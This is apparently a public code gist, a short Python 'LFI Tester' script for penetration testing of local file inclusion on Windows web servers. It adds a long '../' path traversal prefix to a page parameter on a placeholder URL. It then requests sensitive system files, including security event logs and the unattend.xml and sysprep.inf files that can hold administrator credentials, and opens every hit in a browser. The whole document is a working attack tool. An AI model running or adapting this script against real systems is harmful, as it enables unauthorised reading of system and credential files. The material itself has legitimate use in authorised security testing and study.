kkirsche/lfi-tester.py

Last active Oct 20, 2018
LFI Tester
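import requests
import webbrowser

# formatted using Black
# https://blog.rapid7.com/2016/07/29/pentesting-in-the-real-world-local-file-inclusion-with-windows-server-files/

# Base URL of the page under test, ending at the file-include parameter.
url = "http://www.testpage.com?page="
# Traversal prefix that climbs from the web root to the drive root.
LFI = "../../../../../../../../../"
# Windows files checked for inclusion, relative to the drive root.
pages = [
    "boot.ini",
    "WINDOWS/system32/drivers/etc/hosts",
    "WINDOWS/system32/win.ini",
    "WINDOWS/system32/debug/NetSetup.log",
    "WINDOWS/system32/config/AppEvent.Evt",
    "WINDOWS/system32/config/SecEvent.Evt",
    "WINDOWS/Panther/unattend.txt",
    "WINDOWS/Panther/unattend.xml",
    "WINDOWS/Panther/unattended.xml",
    "WINDOWS/Panther/sysprep.inf",
]

for x in pages:
    target = url + LFI + x
    # A timeout keeps one unresponsive request from stalling the whole run.
    check = requests.get(target, timeout=10)
    # A 200 only means the server answered; open the page to inspect the body.
    if check.status_code == 200:
        webbrowser.open(target)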